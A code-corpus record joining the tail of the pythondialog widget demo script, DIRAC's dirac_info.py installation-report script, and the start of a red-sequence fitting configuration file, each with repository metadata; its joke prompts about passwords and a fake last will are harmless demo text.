# True or False):
return d.Yesno("\nDo you like this demo?", yes_label="Yes, I do",
no_label="No, I do not", height=10, width=40,
title="An Important Question")
# 'yesno' dialog box with custom Yes, No and Help buttons
while True:
reply = d.Yesnohelp("\nDo you like this demo?",
yes_label="Yes, I do", no_label="No, I do not",
help_label="Please help me!", height=10,
width=60, title="An Important Question")
if reply == "yes":
return True
elif reply == "no":
return False
elif reply == "help":
d.msgbox("""\
I can hear your cry for help, and would really like to help you. However, I \
am afraid there is not much I can do for you here; you will have to decide \
for yourself on this matter.
Keep in mind that you can always rely on me. \
You have all my support, be brave!""",
height=15, width=60,
title="From Your Faithful Servant")
else:
assert False, "Unexpected reply from MyDialog.Yesnohelp(): " \
+ repr(reply)
def msgbox_demo(self, answer):
if answer:
msg = "Excellent! Press OK to see its source code (or another " \
"file if not in the correct directory)."
else:
msg = "Well, feel free to send your complaints to /dev/null!\n\n" \
"Sincerely yours, etc."
d.msgbox(msg, width=50)
def textbox_demo(self):
# Better use the absolute path for displaying in the dialog title
filepath = os.path.abspath(__file__)
code = d.textbox(filepath, width=76,
title="Contents of {0}".format(filepath),
extra_button=True, extra_label="Stop it now!")
if code == "extra":
d.msgbox("Your wish is my command, Master.", width=40,
title="Exiting")
sys.exit(0)
def inputbox_demo(self):
code, answer = d.inputbox("What's your name?", init="Snow White")
return answer
def inputbox_demo_with_help(self):
init_str = "Snow White"
while True:
code, answer = d.inputbox("What's your name?", init=init_str,
title="'inputbox' demo", help_button=True)
if code == "help":
d.msgbox("Help from the 'inputbox' demo. The string entered "
"so far is {0!r}.".format(answer),
title="'inputbox' demo")
init_str = answer
else:
break
return answer
def form_demo(self):
elements = [
("Size (cm)", 1, 1, "175", 1, 20, 4, 3),
("Weight (kg)", 2, 1, "85", 2, 20, 4, 3),
("City", 3, 1, "Groboule-les-Bains", 3, 20, 15, 25),
("State", 4, 1, "Some Lost Place", 4, 20, 15, 25),
("Country", 5, 1, "Nowhereland", 5, 20, 15, 20),
("My", 6, 1, "I hereby declare that, upon leaving this "
"world, all", 6, 20, 0, 0),
("Very", 7, 1, "my fortune shall be transferred to Florent "
"Rougon's", 7, 20, 0, 0),
("Last", 8, 1, "bank account number 000 4237 4587 32454/78 at "
"Banque", 8, 20, 0, 0),
("Will", 9, 1, "Cantonale Vaudoise, Lausanne, Switzerland.",
9, 20, 0, 0) ]
code, fields = d.form("Please fill in some personal information:",
elements, width=77)
return fields
def form_demo_with_help(self, item_help=True):
# This function is slightly complex because it provides help support
# with 'help_status=True', and optionally also with 'item_help=True'
# together with 'help_tags=True'. For a very simple version (without
# any help support), see form_demo() above.
minver_for_helptags = "1.2-20130902"
if item_help:
if self.dialog_version_check(minver_for_helptags):
complement = """'item_help=True' is also used in conjunction \
with 'help_tags=True' in order to display per-item help at the bottom of the \
widget."""
else:
item_help = False
complement = """'item_help=True' is not used, because to make \
it consistent with the 'item_help=False' case, dialog {min} or later is \
required (for the --help-tags option); however, it appears that you are using \
version {used}.""".format(min=minver_for_helptags,
used=d.cached_backend_version)
else:
complement = """'item_help=True' is not used, because it has \
been disabled; therefore, there is no per-item help at the bottom of the \
widget."""
text = """\
This is a demo for the 'form' widget, which is similar to 'mixedform' but \
a bit simpler in that it has no notion of field type (to hide contents such \
as passwords).
This demo uses 'help_button=True' to provide a Help button \
and 'help_status=True' to allow redisplaying the widget in the same state \
when leaving the help dialog. {complement}""".format(complement=complement)
elements = [ ("Fruit", 1, 8, "mirabelle plum", 1, 20, 18, 30),
("Color", 2, 8, "yellowish", 2, 20, 18, 30),
("Flavor", 3, 8, "sweet when ripe", 3, 20, 18, 30),
("Origin", 4, 8, "Lorraine", 4, 20, 18, 30) ]
more_kwargs = {}
if item_help:
more_kwargs.update({ "item_help": True,
"help_tags": True })
elements = [ list(l) + [ "Help text for item {0}".format(i+1) ]
for i, l in enumerate(elements) ]
while True:
code, t = d.form(text, elements, height=20, width=65,
title="'form' demo with help facilities",
help_button=True, help_status=True, **more_kwargs)
if code == "help":
label, status, elements = t
d.msgbox("You asked for help concerning the field labelled "
"{0!r}.".format(label), width=50)
else:
# 't' contains the list of items as filled by the user
break
answers = '\n'.join(t)
d.msgbox("Your answers:\n\n{0}".format(indent(answers, " ")),
width=0, height=0,
title="'form' demo with help facilities", no_collapse=True)
return t
def mixedform_demo(self):
HIDDEN = 0x1
READ_ONLY = 0x2
elements = [
("Size (cm)", 1, 1, "175", 1, 20, 4, 3, 0x0),
("Weight (kg)", 2, 1, "85", 2, 20, 4, 3, 0x0),
("City", 3, 1, "Groboule-les-Bains", 3, 20, 15, 25, 0x0),
("State", 4, 1, "Some Lost Place", 4, 20, 15, 25, 0x0),
("Country", 5, 1, "Nowhereland", 5, 20, 15, 20, 0x0),
("My", 6, 1, "I hereby declare that, upon leaving this "
"world, all", 6, 20, 54, 0, READ_ONLY),
("Very", 7, 1, "my fortune shall be transferred to Florent "
"Rougon's", 7, 20, 54, 0, READ_ONLY),
("Last", 8, 1, "bank account number 000 4237 4587 32454/78 at "
"Banque", 8, 20, 54, 0, READ_ONLY),
("Will", 9, 1, "Cantonale Vaudoise, Lausanne, Switzerland.",
9, 20, 54, 0, READ_ONLY),
("Read-only field...", 10, 1, "... that doesn't go into the "
"output list", 10, 20, 0, 0, 0x0),
("\/3r`/ 53kri7 (0d3", 11, 1, "", 11, 20, 15, 20, HIDDEN) ]
code, fields = d.mixedform(
"Please fill in some personal information:", elements, width=77)
return fields
def passwordform_demo(self):
elements = [
("Secret field 1", 1, 1, "", 1, 20, 12, 0),
("Secret field 2", 2, 1, "", 2, 20, 12, 0),
("Secret field 3", 3, 1, "Providing a non-empty initial content "
"(like this) for an invisible field can be very confusing!",
3, 20, 30, 160)]
code, fields = d.passwordform(
"Please enter all your secret passwords.\n\nOn purpose here, "
"nothing is echoed when you type in the passwords. If you want "
"asterisks, use the 'insecure' keyword argument as in the "
"passwordbox demo.",
elements, width=77, height=15, title="Passwordform demo")
d.msgbox("Secret password 1: '%s'\n"
"Secret password 2: '%s'\n"
"Secret password 3: '%s'" % tuple(fields),
width=60, height=20, title="The Whole Truth Now Revealed")
return fields
def menu_demo(self, name, city, state, country, size, weight, secret_code,
last_will1, last_will2, last_will3, last_will4):
text = """\
Hello, %s from %s, %s, %s, %s cm, %s kg.
Thank you for giving us your Very Secret Code '%s'.
As expressly stated in the previous form, your Last Will reads: "%s"
All that was very interesting, thank you. However, in order to know you \
better and provide you with the best possible customer service, we would \
still need to know your favorite day of the week. Please indicate your \
preference below.""" \
% (name, city, state, country, size, weight, secret_code,
' '.join([last_will1, last_will2, last_will3, last_will4]))
code, tag = d.menu(text, height=23, width=76,
choices=[("Monday", "Being the first day of the week..."),
("Tuesday", "Comes after Monday"),
("Wednesday", "Before Thursday day"),
("Thursday", "Itself after Wednesday"),
("Friday", "The best day of all"),
("Saturday", "Well, I've had enough, thanks"),
("Sunday", "Let's rest a little bit")])
return tag
def menu_demo_with_help(self):
text = """Sample 'menu' dialog box with help_button=True and \
item_help=True."""
while True:
code, tag = d.menu(text, height=16, width=60,
choices=[("Tag 1", "Item 1", "Help text for item 1"),
("Tag 2", "Item 2", "Help text for item 2"),
("Tag 3", "Item 3", "Help text for item 3"),
("Tag 4", "Item 4", "Help text for item 4"),
("Tag 5", "Item 5", "Help text for item 5"),
("Tag 6", "Item 6", "Help text for item 6"),
("Tag 7", "Item 7", "Help text for item 7"),
("Tag 8", "Item 8", "Help text for item 8")],
title="A menu with help facilities",
help_button=True, item_help=True, help_tags=True)
if code == "help":
d.msgbox("You asked for help concerning the item identified by "
"tag {0!r}.".format(tag), height=8, width=40)
else:
break
d.msgbox("You have chosen the item identified by tag "
"{0!r}.".format(tag), height=8, width=40)
def checklist_demo(self):
# We could put non-empty items here (not only the tag for each entry)
code, tags = d.checklist(text="What sandwich toppings do you like?",
height=15, width=54, list_height=7,
choices=[("Catsup", "", False),
("Mustard", "", False),
("Pesto", "", False),
("Mayonnaise", "", True),
("Horse radish","", True),
("Sun-dried tomatoes", "", True)],
title="Do you prefer ham or spam?",
backtitle="And now, for something "
"completely different...")
return tags
SAMPLE_DATA_FOR_BUILDLIST_AND_CHECKLIST = [
("Tag 1", "Item 1", True, "Help text for item 1"),
("Tag 2", "Item 2", False, "Help text for item 2"),
("Tag 3", "Item 3", False, "Help text for item 3"),
("Tag 4", "Item 4", True, "Help text for item 4"),
("Tag 5", "Item 5", True, "Help text for item 5"),
("Tag 6", "Item 6", False, "Help text for item 6"),
("Tag 7", "Item 7", True, "Help text for item 7"),
("Tag 8", "Item 8", False, "Help text for item 8") ]
def checklist_demo_with_help(self):
text = """Sample 'checklist' dialog box with help_button=True, \
item_help=True and help_status=True."""
choices = self.SAMPLE_DATA_FOR_BUILDLIST_AND_CHECKLIST
while True:
code, t = d.checklist(text, height=0, width=0, list_height=0,
choices=choices,
title="A checklist with help facilities",
help_button=True, item_help=True,
help_tags=True, help_status=True)
if code == "help":
tag, selected_tags, choices = t
d.msgbox("You asked for help concerning the item identified "
"by tag {0!r}.".format(tag), height=7, width=60)
else:
# 't' contains the list of tags corresponding to checked items
break
s = '\n'.join(t)
d.msgbox("The tags corresponding to checked items are:\n\n"
"{0}".format(indent(s, " ")), height=15, width=60,
title="'checklist' demo with help facilities",
no_collapse=True)
def radiolist_demo(self):
choices = [
("Hamburger", "2 slices of bread, a steak...", False),
("Hotdog", "doesn't bite any more", False),
("Burrito", "no se lo que es", False),
("Doener", "Huh?", False),
("Falafel", "Erm...", False),
("Bagel", "Of course!", False),
("Big Mac", "Ah, that's easy!", True),
("Whopper", "Erm, sorry", False),
("Quarter Pounder", 'called "le Big Mac" in France', False),
("Peanut Butter and Jelly", "Well, that's your own business...",
False),
("Grilled cheese", "And nothing more?", False) ]
while True:
code, t = d.radiolist(
"What's your favorite kind of sandwich?", width=68,
choices=choices, help_button=True, help_status=True)
if code == "help":
# Prepare to redisplay the radiolist in the same state as it
# was before the user pressed the Help button.
tag, selected, choices = t
d.msgbox("You asked for help about something called {0!r}. "
"Sorry, but I am quite incompetent in this matter."
.format(tag))
else:
# 't' is the chosen tag
break
return t
def rangebox_demo(self):
nb = 10 # initial value
while True:
code, nb = d.rangebox("""\
How many Microsoft(TM) engineers are needed to prepare such a sandwich?
You can use the Up and Down arrows, Page Up and Page Down, Home and End keys \
to change the value; you may also use the Tab key, Left and Right arrows \
and any of the 0-9 keys to change a digit of the value.""",
min=1, max=20, init=nb,
extra_button=True, extra_label="Joker")
if code == "ok":
break
elif code == "extra":
d.msgbox("Well, {0} may be enough. Or not, depending on the "
"phase of the moon...".format(nb))
else:
assert False, "Unexpected Dialog exit code: {0!r}".format(code)
return nb
def buildlist_demo(self):
items0 = [("A Monty Python DVD", False),
("A Monty Python script", False),
('A DVD of "Barry Lyndon" by Stanley Kubrick', False),
('A DVD of "The Good, the Bad and the Ugly" by Sergio Leone',
False),
('A DVD of "The Trial" by Orson Welles', False),
('The Trial, by Franz Kafka', False),
('Animal Farm, by George Orwell', False),
('Notre-Dame de Paris, by Victor Hugo', False),
('Les Misérables, by Victor Hugo', False),
('Le Lys dans la Vallée, by Honoré de Balzac', False),
('Les Rois Maudits, by Maurice Druon', False),
('A Georges Brassens CD', False),
("A book of Georges Brassens' songs", False),
('A Nina Simone CD', False),
('Javier Vazquez y su Salsa - La Verdad', False),
('The last Justin Bieber album', False),
('A printed copy of the Linux kernel source code', False),
('A CD player', False),
('A DVD player', False),
('An MP3 player', False)]
# Use the name as tag, item string and item-help string; the item-help
# will be useful for long names because it is displayed in a place
# that is large enough to avoid truncation. If not using
# item_help=True, then the last element of eash tuple must be omitted.
items = [ (tag, tag, status, tag) for (tag, status) in items0 ]
text = """If you were stranded on a desert island, what would you \
take?
Press the space bar to toggle the status of an item between selected (on \
the left) and unselected (on the right). You can use the TAB key or \
^ and $ to change the focus between the different parts of the widget.
(this widget is called with item_help=True and visit_items=True)"""
code, l = d.buildlist(text, items=items, visit_items=True,
item_help=True,
title="A simple 'buildlist' demo")
return l
def buildlist_demo_with_help(self):
text = """Sample 'buildlist' dialog box with help_button=True, \
item_help=True, help_status=True, and visit_items=False.
Keys: SPACE select or deselect the highlighted item, i.e.,
move it between the left and right lists
^ move the focus to the left list
$ move the focus to the right list
TAB move focus
ENTER press the focused button"""
items = self.SAMPLE_DATA_FOR_BUILDLIST_AND_CHECKLIST
while True:
code, t = d.buildlist(text, height=0, width=0, list_height=0,
items=items,
title="A 'buildlist' with help facilities",
help_button=True, item_help=True,
help_tags=True, help_status=True,
no_collapse=True)
if code == "help":
tag, selected_tags, items = t
d.msgbox("You asked for help concerning the item identified "
"by tag {0!r}.".format(tag), height=7, width=60)
else:
# 't' contains the list of tags corresponding to selected items
break
s = '\n'.join(t)
d.msgbox("The tags corresponding to selected items are:\n\n"
"{0}".format(indent(s, " ")), height=15, width=60,
title="'buildlist' demo with help facilities",
no_collapse=True)
def calendar_demo(self):
code, date = d.calendar("When do you think Georg Cantor was born?")
return date
def calendar_demo_with_help(self):
# Start with the current date
day, month, year = -1, -1, -1
while True:
code, date = d.calendar("When do you think Georg Cantor was born?",
day=day, month=month, year=year,
title="'calendar' demo",
help_button=True)
if code == "help":
day, month, year = date
d.msgbox("Help dialog for date {0:04d}-{1:02d}-{2:02d}.".format(
year, month, day), title="'calendar' demo")
else:
break
return date
def comment_on_Cantor_date_of_birth(self, day, month, year):
complement = """\
For your information, Georg Ferdinand Ludwig Philip Cantor, a great \
mathematician, was born on March 3, 1845 in Saint Petersburg, and died on \
January 6, 1918. Among other things, Georg Cantor laid the foundation for \
the set theory (which is at the basis of most modern mathematics) \
and was the first person to give a rigorous definition of real numbers."""
if (year, month, day) == (1845, 3, 3):
return "Spot-on! I'm impressed."
elif year == 1845:
return "You guessed the year right. {0}".format(complement)
elif abs(year-1845) < 30:
return "Not too far. {0}".format(complement)
else:
return "Well, not quite. {0}".format(complement)
def timebox_demo(self):
# Get the current time (to display initially in the timebox)
tm = time.localtime()
init_hour, init_min, init_sec = tm.tm_hour, tm.tm_min, tm.tm_sec
# tm.tm_sec can be 60 or even 61 according to the doc of the time module!
init_sec = min(59, init_sec)
code, (hour, minute, second) = d.timebox(
"And at what time, if I may ask?",
hour=init_hour, minute=init_min, second=init_sec)
return (hour, minute, second)
def passwordbox_demo(self):
# 'insecure' keyword argument only asks dialog to echo asterisks when
# the user types characters. Not *that* bad.
code, password = d.passwordbox("What is your root password, "
"so that I can crack your system "
"right now?", insecure=True)
return password
def scrollbox_demo(self, name, favorite_day, toppings, sandwich,
nb_engineers, desert_island_stuff, date, time_,
password):
tw71 = textwrap.TextWrapper(width=71, break_long_words=False,
break_on_hyphens=True)
if nb_engineers is not None:
sandwich_comment = " (the preparation of which requires, " \
"according to you, {nb_engineers} MS {engineers})".format(
nb_engineers=nb_engineers,
engineers="engineers" if nb_engineers != 1 else "engineer")
else:
sandwich_comment = ""
sandwich_report = "Favorite sandwich: {sandwich}{comment}".format(
sandwich=sandwich, comment=sandwich_comment)
if desert_island_stuff is None:
# The widget was not available, the user didn't see anything.
desert_island_string = ""
else:
if len(desert_island_stuff) == 0:
desert_things = " nothing!"
else:
desert_things = "\n\n " + "\n ".join(desert_island_stuff)
desert_island_string = \
"\nOn a desert island, you would take:{0}\n".format(
desert_things)
day, month, year = date
hour, minute, second = time_
msg = """\
Here are some vital statistics about you:
Name: {name}
Favorite day of the week: {favday}
Favorite sandwich toppings:{toppings}
{sandwich_report}
{desert_island_string}
Your answer about Georg Cantor's date of birth: \
{year:04d}-{month:02d}-{day:02d}
(at precisely {hour:02d}:{min:02d}:{sec:02d}!)
{comment}
Your root password is: ************************** (looks good!)""".format(
name=name, favday=favorite_day,
toppings="\n ".join([''] + toppings),
sandwich_report=tw71.fill(sandwich_report),
desert_island_string=desert_island_string,
year=year, month=month, day=day,
hour=hour, min=minute, sec=second,
comment=tw71.fill(
self.comment_on_Cantor_date_of_birth(day, month, year)))
d.scrollbox(msg, height=20, width=75, title="Great Report of the Year")
TREEVIEW_BASE_TEXT = """\
This is an example of the 'treeview' widget{options}. Nodes are labelled in a \
way that reflects their position in the tree, but this is not a requirement: \
you are free to name them the way you like.
Node 0 is the root node. It has 3 children tagged 0.1, 0.2 and 0.3. \
You should now select a node with the space bar."""
def treeview_demo(self):
code, tag = d.treeview(self.TREEVIEW_BASE_TEXT.format(options=""),
nodes=[ ("0", "node 0", False, 0),
("0.1", "node 0.1", False, 1),
("0.2", "node 0.2", False, 1),
("0.2.1", "node 0.2.1", False, 2),
("0.2.1.1", "node 0.2.1.1", True, 3),
("0.2.2", "node 0.2.2", False, 2),
("0.3", "node 0.3", False, 1),
("0.3.1", "node 0.3.1", False, 2),
("0.3.2", "node 0.3.2", False, 2) ],
title="'treeview' demo")
d.msgbox("You selected the node tagged {0!r}.".format(tag),
title="treeview demo")
return tag
def treeview_demo_with_help(self):
text = self.TREEVIEW_BASE_TEXT.format(
options=" with help_button=True, item_help=True and "
"help_status=True")
nodes = [ ("0", "node 0", False, 0, "Help text 1"),
("0.1", "node 0.1", False, 1, "Help text 2"),
("0.2", "node 0.2", False, 1, "Help text 3"),
("0.2.1", "node 0.2.1", False, 2, "Help text 4"),
("0.2.1.1", "node 0.2.1.1", True, 3, "Help text 5"),
("0.2.2", "node 0.2.2", False, 2, "Help text 6"),
("0.3", "node 0.3", False, 1, "Help text 7"),
("0.3.1", "node 0.3.1", False, 2, "Help text 8"),
("0.3.2", "node 0.3.2", False, 2, "Help text 9") ]
while True:
code, t = d.treeview(text, nodes=nodes,
title="'treeview' demo with help facilities",
help_button=True, item_help=True,
help_tags=True, help_status=True)
if code == "help":
# Prepare to redisplay the treeview in the same state as it
# was before the user pressed the Help button.
tag, selected_tag, nodes = t
d.msgbox("You asked for help about the node with tag {0!r}."
.format(tag))
else:
# 't' is the chosen tag
break
d.msgbox("You selected the node tagged {0!r}.".format(t),
title="'treeview' demo")
return t
def editbox_demo(self, filepath):
if os.path.isfile(filepath):
code, text = d.editbox(filepath, 20, 60,
title="A Cheap Text Editor")
d.scrollbox(text, title="Resulting text")
else:
d.msgbox("Skipping the first part of the 'editbox' demo, "
"as '{0}' can't be found.".format(filepath),
title="'msgbox' demo")
l = ["In the previous dialog, the initial contents was",
"explicitly written to a file. With Dialog.editbox_str(),",
"you can provide it as a string and pythondialog will",
"automatically create and delete a temporary file for you",
"holding this text for dialog.\n"] + \
[ "This is line {0} of a boring sample text.".format(i+1)
for i in range(100) ]
code, text = d.editbox_str('\n'.join(l), 0, 0,
title="A Cheap Text Editor")
d.scrollbox(text, title="Resulting text")
def inputmenu_demo(self):
choices = [ ("1st_tag", "Item 1 text"),
("2nd_tag", "Item 2 text"),
("3rd_tag", "Item 3 text") ]
for i in range(4, 21):
choices.append(("%dth_tag" % i, "Item %d text" % i))
while True:
code, tag, new_item_text = d.inputmenu(
"Demonstration of 'inputmenu'. Any single item can be either "
"accepted as is, or renamed.",
height=0, width=60, menu_height=10, choices=choices,
help_button=True, title="'inputmenu' demo")
if code == "help":
d.msgbox("You asked for help about the item with tag {0!r}."
.format(tag))
continue
elif code == "accepted":
text = "The item corresponding to tag {0!r} was " \
"accepted.".format(tag)
elif code == "renamed":
text = "The item corresponding to tag {0!r} was renamed to " \
"{1!r}.".format(tag, new_item_text)
else:
text = "Unexpected exit code from 'inputmenu': {0!r}.\n\n" \
"It may be a bug. Please report.".format(code)
break
d.msgbox(text, width=60, title="Outcome of the 'inputmenu' demo")
# Help strings used in several places
FSELECT_HELP = """\
Hint: the complete file path must be entered in the bottom field. One \
convenient way to achieve this is to use the SPACE bar when the desired file \
is highlighted in the top-right list.
As usual, you can use the TAB and arrow keys to move between controls. If in \
the bottom field, the SPACE key provides auto-completion."""
# The following help text was initially meant to be used for several
# widgets (at least progressbox and tailbox). Currently (dialog version
# 1.2-20130902), "dialog --tailbox" doesn't seem to work with FIFOs, so the
# "flexibility" of the help text is unused (another text is used when
# demonstrating --tailbox). However, this might change in the future...
def FIFO_HELP(self, widget):
return """\
For demos based on the {widget} widget, you may use a FIFO, also called \
"named pipe". This is a special kind of file, to which you will be able to \
easily append data. With the {widget} widget, you can see the data stream \
flow in real time.
To create a FIFO, you can use the commmand mkfifo(1), like this:
% mkfifo /tmp/my_shiny_new_fifo
Then, you can cat(1) data to the FIFO like this:
% cat >>/tmp/my_shiny_new_fifo
First line of text
Second line of text
...
You can end the input to cat(1) by typing Ctrl-D at the beginning of a \
line.""".format(widget=widget)
def fselect_demo(self, widget, init_path=None, allow_FIFOs=False, **kwargs):
init_path = init_path or params["home_dir"]
# Make sure the directory we chose ends with os.sep so that dialog
# shows its contents right away
if not init_path.endswith(os.sep):
init_path += os.sep
while True:
# We want to let the user quit this particular dialog with Cancel
# without having to bother choosing a file, therefore we use the
# original fselect() from dialog.Dialog and interpret the return
# code manually. (By default, the MyDialog class defined in this
# file intercepts the CANCEL and ESC exit codes and causes them to
# spawn the "confirm quit" dialog.)
code, path = self.Dialog_instance.fselect(
init_path, height=10, width=60, help_button=True, **kwargs)
# Display the "confirm quit" dialog if the user pressed ESC.
if not d.check_exit_request(code, ignore_Cancel=True):
continue
# Provide an easy way out...
if code == d.CANCEL:
path = None
break
elif code == "help":
d.msgbox("Help about {0!r} from the 'fselect' dialog.".format(
path), title="'fselect' demo")
init_path = path
elif code == d.OK:
# Of course, one can use os.path.isfile(path) here, but we want
# to allow regular files *and* possibly FIFOs. Since there is
# no os.path.is*** convenience function for FIFOs, let's go
# with os.stat.
try:
mode = os.stat(path)[stat.ST_MODE]
except os.error as e:
d.msgbox("Error: {0}".format(e))
continue
# Accept FIFOs only if allow_FIFOs is True
if stat.S_ISREG(mode) or (allow_FIFOs and stat.S_ISFIFO(mode)):
break
else:
if allow_FIFOs:
help_text = """\
You are expected to select a *file* here (possibly a FIFO), or press the \
Cancel button.\n\n%s
For your convenience, I will reproduce the FIFO help text here:\n\n%s""" \
% (self.FSELECT_HELP, self.FIFO_HELP(widget))
else:
help_text = """\
You are expected to select a regular *file* here, or press the \
Cancel button.\n\n%s""" % (self.FSELECT_HELP,)
d.msgbox(help_text, width=72, height=20)
else:
d.msgbox("Unexpected exit code from Dialog.fselect(): {0}.\n\n"
"It may be a bug. Please report.".format(code))
return path
def dselect_demo(self, init_dir=None):
init_dir = init_dir or params["home_dir"]
# Make sure the directory we chose ends with os.sep so that dialog
# shows its contents right away
if not init_dir.endswith(os.sep):
init_dir += os.sep
while True:
code, path = d.dselect(init_dir, 10, 50,
title="Please choose a directory",
help_button=True)
if code == "help":
d.msgbox("Help about {0!r} from the 'dselect' dialog.".format(
path), title="'dselect' demo")
init_dir = path
# When Python 3.2 is old enough, we'll be able to check if
# path.endswith(os.sep) and remove the trailing os.sep if this
# does not change the path according to os.path.samefile().
elif not os.path.isdir(path):
d.msgbox("Hmm. It seems that {0!r} is not a directory".format(
path), title="'dselect' demo")
else:
break
d.msgbox("Directory '%s' thanks you for choosing him." % path)
return path
def tailbox_demo(self, height=22, width=78):
widget = "tailbox"
# First, ask the user for a file.
# Strangely (dialog version 1.2-20130902 bug?), "dialog --tailbox"
# doesn't work with FIFOs: "Error moving file pointer in last_lines()"
# and DIALOG_ERROR exit status.
path = self.fselect_demo(widget, allow_FIFOs=False,
title="Please choose a file to be shown as "
"with 'tail -f'")
# Now, the tailbox
if path is None:
# User chose to abort
return
else:
d.tailbox(path, height, width, title="Tailbox example")
def pause_demo(self, seconds):
d.pause("""\
Ugh, sorry. pythondialog is still in development, and its advanced circuitry \
detected internal error number 0x666. That's a pretty nasty one, you know.
I am embarrassed. I don't know how to tell you, but we are going to have to \
reboot. In %d seconds.
Fasten your seatbelt...""" % seconds, height=18, seconds=seconds)
def process_command_line():
global params
try:
opts, args = getopt.getopt(sys.argv[1:], "ftE",
["test-suite",
"fast",
"debug",
"debug-file=",
"debug-expand-file-opt",
"help",
"version"])
except getopt.GetoptError:
print(usage, file=sys.stderr)
return ("exit", 1)
# Let's start with the options that don't require any non-option argument
# to be present
for option, value in opts:
if option == "--help":
print(usage)
return ("exit", 0)
elif option == "--version":
print("%s %s\n%s" % (progname, progversion, version_blurb))
return ("exit", 0)
# Now, require a correct invocation.
if len(args) != 0:
print(usage, file=sys.stderr)
return ("exit", 1)
# Default values for parameters
params = { "fast_mode": False,
"testsuite_mode": False,
"debug": False,
"debug_filename": default_debug_filename,
"debug_expand_file_opt": False }
# Get the home directory, if any, and store it in params (often useful).
root_dir = os.sep # This is OK for Unix-like systems
params["home_dir"] = os.getenv("HOME", root_dir)
# General option processing
for option, value in opts:
if option in ("-t", "--test-suite"):
params["testsuite_mode"] = True
# --test-suite implies --fast
params["fast_mode"] = True
elif option in ("-f", "--fast"):
params["fast_mode"] = True
elif option == "--debug":
params["debug"] = True
elif option == "--debug-file":
params["debug_filename"] = value
elif option in ("-E", "--debug-expand-file-opt"):
params["debug_expand_file_opt"] = True
else:
# The options (such as --help) that cause immediate exit
# were already checked, and caused the function to return.
# Therefore, if we are here, it can't be due to any of these
# options.
assert False, "Unexpected option received from the " \
"getopt module: '%s'" % option
return ("continue", None)
def main():
"""This demo shows the main features of pythondialog."""
locale.setlocale(locale.LC_ALL, '')
what_to_do, code = process_command_line()
if what_to_do == "exit":
sys.exit(code)
try:
app = MyApp()
app.run()
except dialog.error as exc_instance:
# The error that causes a PythonDialogErrorBeforeExecInChildProcess to
# be raised happens in the child process used to run the dialog-like
# program, and the corresponding traceback is printed right away from
# that child process when the error is encountered. Therefore, don't
# print a second, not very useful traceback for this kind of exception.
if not isinstance(exc_instance,
dialog.PythonDialogErrorBeforeExecInChildProcess):
print(traceback.format_exc(), file=sys.stderr)
print("Error (see above for a traceback):\n\n{0}".format(
exc_instance), file=sys.stderr)
sys.exit(1)
sys.exit(0)
if __name__ == "__main__": main()
|
Morphux/installer
|
pythondialog/examples/demo.py
|
Python
|
apache-2.0
| 71,973
|
[
"Galaxy"
] |
689ec84760b8ddbe3384cf6e82bc2515266426fa4b652f47eb3c6775eb2a91a2
|
#!/usr/bin/env python
########################################################################
# File : dirac-info
# Author : Andrei Tsaregorodtsev
########################################################################
"""
Report info about local DIRAC installation
Example:
$ dirac-info
Option Value
============================
Setup Dirac-Production
ConfigurationServer dips://ccdiracli08.in2p3.fr:9135/Configuration/Server
Installation path /opt/dirac/versions/v7r2-pre33_1613239204
Installation type client
Platform Linux_x86_64_glibc-2.17
VirtualOrganization dteam
User DN /DC=org/DC=ugrid/O=people/O=BITP/CN=Andrii Lytovchenko
Proxy validity, secs 0
Use Server Certificate Yes
Skip CA Checks No
DIRAC version v7r2-pre33
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__RCSID__ = "$Id$"
from DIRAC.Core.Utilities.DIRACScript import DIRACScript
@DIRACScript()
def main():
import os
import DIRAC
from DIRAC import gConfig
from DIRAC.Core.Base import Script
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC.Core.Utilities.PrettyPrint import printTable
def version(arg):
Script.disableCS()
print(DIRAC.version)
DIRAC.exit(0)
def platform(arg):
Script.disableCS()
print(DIRAC.getPlatform())
DIRAC.exit(0)
Script.registerSwitch("v", "version", "print version of current DIRAC installation", version)
Script.registerSwitch("p", "platform", "print platform of current DIRAC installation", platform)
Script.parseCommandLine(ignoreErrors=True)
records = []
records.append(('Setup', gConfig.getValue('/DIRAC/Setup', 'Unknown')))
records.append(('ConfigurationServer', gConfig.getValue('/DIRAC/Configuration/Servers', [])))
records.append(('Installation path', DIRAC.rootPath))
if os.path.exists(os.path.join(DIRAC.rootPath, DIRAC.getPlatform(), 'bin', 'mysql')):
records.append(('Installation type', 'server'))
else:
records.append(('Installation type', 'client'))
records.append(('Platform', DIRAC.getPlatform()))
ret = getProxyInfo(disableVOMS=True)
if ret['OK']:
if 'group' in ret['Value']:
vo = getVOForGroup(ret['Value']['group'])
else:
vo = getVOForGroup('')
if not vo:
vo = "None"
records.append(('VirtualOrganization', vo))
if 'identity' in ret['Value']:
records.append(('User DN', ret['Value']['identity']))
if 'secondsLeft' in ret['Value']:
records.append(('Proxy validity, secs', {'Value': str(ret['Value']['secondsLeft']), 'Just': 'L'}))
if gConfig.getValue('/DIRAC/Security/UseServerCertificate', True):
records.append(('Use Server Certificate', 'Yes'))
else:
records.append(('Use Server Certificate', 'No'))
if gConfig.getValue('/DIRAC/Security/SkipCAChecks', False):
records.append(('Skip CA Checks', 'Yes'))
else:
records.append(('Skip CA Checks', 'No'))
records.append(('DIRAC version', DIRAC.version))
fields = ['Option', 'Value']
print()
printTable(fields, records, numbering=False)
print()
if __name__ == "__main__":
main()
|
yujikato/DIRAC
|
src/DIRAC/Core/scripts/dirac_info.py
|
Python
|
gpl-3.0
| 3,315
|
[
"DIRAC"
] |
6a3cba6640124b88f68d67c6ee56692a085c9e58d5c1950151506b8d408e6188
|
import decimal
# ------------------------------- READ THIS -----------------------------------
#
# This file contains the information the code uses to fit the red sequence
# in different band combinations. To add a new band, create a new dictionary
# that holds all the same keys as the ones that already exist. Then add it to
# the `config_matches` dictionary. The key is the string with the name of the
# bands that are used, and the value is the configuration dictionary containing
# all the parameters the code needs.
#
# This file also stores AB to Vega conversions, so if your filters aren't
# already in the ab_to_vega dictionary at the bottom, add them.
#
# ---------------------------- Model parameters --------------------------------
#
# There are things we can change about the SPS models that are used to model
# the red sequence. Right now we can only adjust the formation redshift of this
# model galaxy.
zf = 3.0
# --------------------------- Param documentation -----------------------------
#
# This section describes the parameters the code uses to fit the red sequence.
#
# color: Color being fitted. This needs to be of the format
# "first_band-second_band" with no spaces. The name of the bands
# need to match the names of the filters in the ezgal/data/filters
